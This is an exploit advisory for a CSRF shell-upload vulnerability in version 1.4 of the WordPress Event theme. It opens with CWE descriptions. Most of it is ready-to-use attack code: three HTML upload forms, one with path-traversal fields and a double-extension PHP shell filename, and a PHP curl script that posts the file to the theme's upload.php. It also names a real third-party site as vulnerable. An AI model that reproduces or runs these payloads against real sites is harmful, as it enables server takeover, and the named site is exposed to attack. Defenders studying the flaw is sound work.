WordPress Event Themes 1.4 CSRF Shell Upload Vulnerability

####################################################################

# Exploit Title : WordPress Event Themes 1.4 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/03/2020
# Vendor Homepage : themesinfo.com - esoftarena.com
# Sofware Link : themesinfo.com/?search_type=folder&search=event
# Software Affected Version : 1.4
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
WordPress Event Themes 1.4 is prone to a vulnerability that lets attackers 
upload arbitrary files because it fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible.

CWE-352: Cross-Site Request Forgery (CSRF)
******************************************
The web application does not, or can not, sufficiently verify whether a well-formed, 
valid, consistent request was intentionally provided by the user who submitted the request.

When a web server is designed to receive a request from a client without any mechanism 
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a 
client into making an unintentional request to the web server which will be treated as an 
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and 
can result in exposure of data or unintended code execution.

CWE-264: Permissions, Privileges, and Access Controls
**************************************************
Weaknesses in this category are related to the management of permissions, privileges, and 
other security features that are used to perform access control.

CWE-434: Unrestricted Upload of File with Dangerous Type
****************************************************
The software allows the attacker to upload or transfer files of dangerous types that can 
be automatically processed within the product's environment.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************
CSRF Cross Site Request Forgery Exploiter 1 => 
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/user/wp-content/themes/event/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

# CSRF Cross Site Request Forgery Exploit 2 => 
****************************************
<title>WordPress Event Themes 1.4 Exploiter</title>

<form action="http://[VULNERABLEWEBSITE]/user/wp-content/themes/event/upload.php" method="post" enctype="multipart/form-data">

<body background=" ">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.php.pjpg" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

# CSRF Cross Site Request Forgery Exploit 3=> 
****************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/user/wp-content/themes/event/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress Event Themes Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress Event Themes Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

</form>

PHP Exploiter Code : 
*********************
<?php
$uploadfile="kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^
$ch = curl_init("http://127.0.0.1/user/wp-content/themes/event/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# Vulnerability Error : 
********************
{"error":"File is empty"}

####################################################################

# Example Vulnerable Sites :
************************
[+] publitu.it/user/wp-content/themes/event/upload.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.